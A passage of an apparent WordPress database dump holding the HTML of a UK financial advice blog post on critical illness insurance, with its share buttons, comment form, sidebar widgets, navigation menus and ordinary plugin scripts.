class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=5+Powerful+Reasons+To+Review+Your+Critical+illness+Insurance+%20http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/&amp;title=5%20Powerful%20Reasons%20To%20Review%20Your%20Critical%20illness%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/&amp;title=5%20Powerful%20Reasons%20To%20Review%20Your%20Critical%20illness%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.reidscottross.co.uk%2F5-powerful-reasons-review-critical-illness-insurance%2F&amp;name=5+Powerful+Reasons+To+Review+Your+Critical+illness+Insurance+&amp;description=Do+you+spend+any+time+on+the+small+print+on+your+critical+illness+insurance+cover%3F++In+fact+most+people+will+take+a+quick+look+at+the+conditions+and+assume+they+are+fully+covered%2C+before+putting+it+away+in+a+drawer.\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=5 Powerful Reasons To Review Your Critical illness Insurance&amp;body=http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../5-powerful-reasons-review-critical-illness-insurance/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"7394\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"286ab98067\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"138\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Equity SMART target=\" _blank=\"\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@reidscottross.co.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer></div>&#13;\n	&#13;\n			<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body>','&#13;	5 Powerful Reasons To Review Your Critical illness Insurance','If you have bought critical illness insurance from a bank, adviser or online between 2005 and 2011 learn more about how you increase your payout chances','inherit','closed','closed','','42-revision-v1','','','2017-09-21 16:46:56','2017-09-21 16:46:56','',42,'http://www.equalitywalk.org.uk/42-revision-v1',0,'revision','',0),(242,1,'2017-09-21 16:47:03','2017-09-21 16:47:03','','computer-on-desk-5','','inherit','open','closed','','computer-on-desk-5','','','2017-09-21 16:47:03','2017-09-21 16:47:03','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/computer-on-desk-5.jpg',0,'attachment','image/jpeg',0),(243,1,'2017-09-21 16:47:08','2017-09-21 16:47:08','<body class=\"single single-post postid-8121 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	